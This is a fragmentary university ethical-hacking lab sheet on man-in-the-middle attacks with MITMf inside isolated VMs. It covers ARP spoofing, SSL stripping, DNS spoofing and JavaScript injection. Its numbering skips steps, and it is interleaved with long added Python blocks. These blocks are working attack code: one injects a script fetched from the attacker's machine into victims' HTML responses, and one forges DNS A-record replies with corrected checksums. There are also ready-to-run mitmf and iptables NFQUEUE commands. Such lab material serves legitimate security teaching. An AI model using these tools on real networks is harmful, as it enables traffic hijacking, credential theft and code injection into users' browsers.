Lab 4
Spoofing with MITMf
NOTE: Make sure that your Kali VM runs correctly in VirtualBox and that its network
adapter is set to "NatNetwork". You also need an Ubuntu VM for today's task; configure
it in the same way as Kali. Check that Kali and Ubuntu can reach each other over the
NatNetwork using the ping command.
Note that SSL strip only works if www.yahoo.com is not on the browser's HSTS
(HTTP Strict Transport Security) list: a browser that has an HSTS entry for the host
refuses to talk plain HTTP to it, so there is nothing for the proxy to strip. If SSL
strip does not work well, www.yahoo.com is probably on that list. To remove
www.yahoo.com from the HSTS list in Firefox:
1) Close all open tabs.
2) Open the browsing history (Ctrl + Shift + H).
3) Search "yahoo".
4) Right-click each site listed under yahoo.com and select "Forget About This
Site".
5) Make sure that you access www.yahoo.com again while mitmf is running in the Kali
VM.
This only clears entries the browser learned from a Strict-Transport-Security header;
a domain that is in Firefox's built-in HSTS preload list cannot be removed this way.
CSCI369 Ethical Hacking
This material is copyrighted. It must not be
distributed without permission from
Joonsang Baek and Jongkil Kim
Check what happens in the terminal of the Kali VM. Can you see the username (and
the password, if you have an account)?
Another interesting attack you can perform with mitmf is DNS spoofing:
– when the victim tries to open a website on the target machine, he/she is
redirected to a different website that the attacker has set up.
Now add the line *.unsw.edu.au = <IP of Kali VM> to the DNS A-record section of the
mitmf configuration file and save the change.
b. Note that there are many options for "inject" (check them with
$ python mitmf.py -h | less). Go back to the Ubuntu VM, open a web browser and visit
www.uow.edu.au. What happens?
c. We have used --js-payload. Can we inject a JavaScript file? Yes: the --js-file
option injects a file. Create a JavaScript file with a text editor (file name:
inject.js) and inject it into the target's web browser by running
$ python mitmf.py --arp --spoof --gateway <IP of gateway> --target <IP of Ubuntu> -i eth0 --inject --js-file ./inject.js
If you are familiar with JavaScript, you can inject something more interesting.
Try! Note that we can do much more powerful things with this later on.
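As an added example (not code from MITMf or from this lab), the block below shows the edit that an inject-style plugin has to make to an HTTP response before the victim's browser will run the attacker's script. It is standard-library Python; the Kali address in the script tag is an assumption standing in for "<IP of Kali VM>", and the HTTP request and response it processes are constructed inline rather than captured. It shows the two details that break naive injection: the body can only be edited once any gzip compression is removed (or avoided by stripping Accept-Encoding from the request), and Content-Length has to be recomputed after the tag is inserted or the browser truncates the page and never sees the tag.

```python
import gzip
import re

# Added example, not MITMf's own code: the rewrite an inject-style plugin makes
# on an HTTP response so the victim's browser loads attacker-supplied JavaScript.
# The Kali IP in the tag is assumed, as in the lab's "<IP of Kali VM>".
SCRIPT_TAG = b'<script src="http://10.0.2.4/inject.js"></script>'


def strip_accept_encoding(request: bytes) -> bytes:
    """Drop Accept-Encoding from a client request so the server answers
    uncompressed; otherwise every response has to be inflated before editing."""
    head, sep, body = request.partition(b"\r\n\r\n")
    lines = [l for l in head.split(b"\r\n")
             if not l.lower().startswith(b"accept-encoding:")]
    return b"\r\n".join(lines) + sep + body


def inject_script(response: bytes, tag: bytes = SCRIPT_TAG) -> bytes:
    """Insert `tag` before </body> of an HTML response (Content-Length framed,
    not chunked) and fix the headers so the browser still parses it."""
    head, sep, body = response.partition(b"\r\n\r\n")
    if not sep:
        return response                     # header block not complete
    status_line, *header_lines = head.split(b"\r\n")
    headers = []
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))

    def header(name: bytes) -> bytes:
        return next((v.lower() for n, v in headers if n.lower() == name), b"")

    if not header(b"content-type").startswith(b"text/html"):
        return response                     # only HTML can carry a <script>
    if header(b"content-encoding") == b"gzip":
        # Server compressed anyway: inflate, and drop the header because the
        # edited body is sent on uncompressed.
        body = gzip.decompress(body)
        headers = [(n, v) for n, v in headers if n.lower() != b"content-encoding"]

    m = re.search(rb"</body\s*>", body, re.IGNORECASE)
    body = body[:m.start()] + tag + body[m.start():] if m else body + tag

    # The body grew: Content-Length must be recomputed or the browser truncates
    # the page at the old length and never sees the tag.
    headers = [(n, v) for n, v in headers if n.lower() != b"content-length"]
    headers.append((b"Content-Length", str(len(body)).encode()))
    new_head = b"\r\n".join([status_line] + [n + b": " + v for n, v in headers])
    return new_head + sep + body


# Constructed sample traffic (not captured): a gzip'd HTML reply from the site
# the lab has the victim visit, and the request that asked for it.
SAMPLE_HTML = (b"<html><head><title>UOW</title></head>"
               b"<body><h1>Hello</h1></BODY></html>")
_GZ = gzip.compress(SAMPLE_HTML)
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
                   b"Content-Encoding: gzip\r\nContent-Length: %d\r\n\r\n" % len(_GZ)) + _GZ
SAMPLE_REQUEST = (b"GET / HTTP/1.1\r\nHost: www.uow.edu.au\r\n"
                  b"Accept-Encoding: gzip, deflate\r\n\r\n")

if __name__ == "__main__":
    print(strip_accept_encoding(SAMPLE_REQUEST).decode())
    print(inject_script(SAMPLE_RESPONSE).decode())
```

Chunked transfer encoding is not handled here; a real proxy has to de-chunk the body first. Note that inject.js is fetched from the attacker's machine but executes in the origin of the page it was injected into, so it can read that page's DOM and any cookies not marked HttpOnly.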
5. (Advanced work with mitmf) Although mitmf itself is a very powerful tool, an
ethical hacker often wants to go beyond the attacks already implemented in mitmf and
tailor something more advanced. One possible way is to use Scapy and NetfilterQueue
to analyze and manipulate the packets in live traffic.
Note: NetfilterQueue lets a Python program receive the packets that an iptables rule
on Linux has sent to the NFQUEUE target, inspect or modify them, and then decide
whether to accept or drop each one.
2) Run mitmf for the ARP spoofing. For example, if the gateway IP address is
10.0.2.1 and the victim IP address is 10.0.2.15, you can run the following
command to hijack the traffic:
$ python mitmf.py --arp --spoof --gateway 10.0.2.1 --target 10.0.2.15 -i eth0
3) Add an iptables rule with the following command. It hands traffic arriving at
Kali to NetfilterQueue queue number 1 before the routing decision is made:
$ iptables -t nat -A PREROUTING -j NFQUEUE --queue-num 1
Note that the nat table is consulted only for the first packet of each connection,
so this rule shows your callback one packet per new flow; if you want every
forwarded packet, attach the NFQUEUE target to the FORWARD chain of the filter table
instead.
from netfilterqueue import NetfilterQueue   # Python binding for NFQUEUE
from scapy.all import IP                    # Scapy dissects the raw bytes

def callback(packet):
    payload = packet.get_payload()   # raw bytes of the queued packet
    pkt = IP(payload)                # parse them with Scapy, starting at the IP layer
    print(pkt.summary())             # show what was captured
    packet.accept()                  # release it; without a verdict, packets stay queued and traffic stalls

def main():
    q = NetfilterQueue()
    q.bind(1, callback)   # attach the callback to queue number 1 (the --queue-num above)
    try:
        q.run()           # main loop: receive packets from the kernel
    except KeyboardInterrupt:
        q.unbind()        # release the queue on Ctrl-C

main()
5) Access some sites from the Ubuntu VM and check whether the packet information is
printed properly.
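The DNS spoofing configured in mitmf above and the NetfilterQueue callback are the same operation seen from two sides. As an added example (not MITMf's or the lab's code), the block below performs that rewrite by hand on the raw bytes that packet.get_payload() hands to a NetfilterQueue callback: it parses IPv4/UDP/DNS, replaces every A-record answer for a question matching *.unsw.edu.au with the attacker's address, and recomputes the UDP checksum. It is standard-library Python so it runs without scapy installed; the rule's Kali address 10.0.2.4 is an assumption, and the packet it works on is constructed inline by build_sample_reply, not captured. In the lab callback you would pass the result to packet.set_payload() before packet.accept(); with Scapy, the IP()/UDP()/DNS() layers do the parsing and `del pkt[UDP].chksum` makes it recompute the checksum for you.

```python
import fnmatch
import socket
import struct

# Added example (not MITMf's or the lab's code): the A-record rewrite the lab
# configures in mitmf, done by hand on the raw bytes a NetfilterQueue callback
# receives. Stdlib only, so it runs without scapy.
SPOOF_RULES = {"*.unsw.edu.au": "10.0.2.4"}   # assumed Kali IP, as in the config line

def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum used by the IPv4 and UDP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def read_name(msg: bytes, off: int):
    """Decode the DNS name at off (following 0xC0 compression pointers);
    returns (dotted name, offset just past the name's bytes at off)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                      # pointer into the message
            end = off + 2 if end is None else end
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), (off if end is None else end)

def walk_reply(dns: bytes):
    """One-question DNS reply -> (qname, [(rtype, rdata_offset, rdlen), ...])."""
    _, flags, qd, an, _, _ = struct.unpack("!HHHHHH", dns[:12])
    if not flags & 0x8000 or qd != 1:                  # QR clear: it is a query
        return None, []
    qname, off = read_name(dns, 12)
    off += 4                                           # QTYPE + QCLASS
    records = []
    for _ in range(an):
        _, off = read_name(dns, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", dns[off:off + 10])
        records.append((rtype, off + 10, rdlen))
        off += 10 + rdlen
    return qname, records

def udp_checksum(raw: bytes, ihl: int) -> int:
    """Checksum over IPv4 pseudo-header + UDP header (field zeroed) + data."""
    ulen = struct.unpack("!H", raw[ihl + 4:ihl + 6])[0]
    pseudo = raw[12:20] + b"\x00\x11" + struct.pack("!H", ulen)
    seg = raw[ihl:ihl + 6] + b"\x00\x00" + raw[ihl + 8:ihl + ulen]
    return checksum(pseudo + seg) or 0xFFFF            # 0 would mean "absent"

def spoof_dns_reply(raw: bytes, rules=SPOOF_RULES):
    """Rewrite the A answers of a reply whose question matches a rule;
    returns the new packet, or None when the packet should pass untouched."""
    if raw[0] >> 4 != 4 or raw[9] != 17:               # IPv4 carrying UDP only
        return None
    ihl = (raw[0] & 0x0F) * 4
    if struct.unpack("!H", raw[ihl:ihl + 2])[0] != 53:  # source port 53: a reply
        return None
    dns = bytearray(raw[ihl + 8:])
    qname, records = walk_reply(dns)
    target = None if qname is None else next(
        (ip for pat, ip in rules.items() if fnmatch.fnmatchcase(qname, pat)), None)
    if target is None:
        return None
    for rtype, off, rdlen in records:
        if rtype == 1 and rdlen == 4:                  # A record: swap the RDATA
            dns[off:off + 4] = socket.inet_aton(target)
    pkt = bytearray(raw[:ihl + 8]) + dns
    # Same length, so the IP header stays valid; the UDP checksum covers the
    # payload and must be redone (Scapy: `del pkt[UDP].chksum`).
    pkt[ihl + 6:ihl + 8] = struct.pack("!H", udp_checksum(bytes(pkt), ihl))
    return bytes(pkt)

def answer_ips(raw: bytes):
    """A-record addresses carried by a reply, used to check the rewrite."""
    dns = raw[(raw[0] & 0x0F) * 4 + 8:]
    return [socket.inet_ntoa(dns[o:o + 4]) for t, o, n in walk_reply(dns)[1] if t == 1]

def udp_checksum_ok(raw: bytes) -> bool:
    ihl = (raw[0] & 0x0F) * 4
    return struct.unpack("!H", raw[ihl + 6:ihl + 8])[0] == udp_checksum(raw, ihl)

def build_sample_reply(qname: str, answer_ip: str) -> bytes:
    """Constructed sample (not a capture): an A reply from resolver 10.0.2.3 to
    the Ubuntu victim 10.0.2.15; the answer name is the pointer 0xC00C."""
    labels = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\x00"
    dns = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0) + labels + struct.pack("!HH", 1, 1)
    dns += b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 300, 4) + socket.inet_aton(answer_ip)
    ulen = 8 + len(dns)
    src, dst = socket.inet_aton("10.0.2.3"), socket.inet_aton("10.0.2.15")
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + ulen, 0, 0, 64, 17, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    pkt = ip + struct.pack("!HHHH", 53, 40000, ulen, 0) + dns
    return pkt[:26] + struct.pack("!H", udp_checksum(pkt, 20)) + pkt[28:]
```

Because the rewritten reply has the same length as the original, the IP header and its checksum are untouched; if a manipulation ever changes the payload length, the IP total-length field and IP checksum have to be fixed as well, or the victim's kernel drops the packet silently.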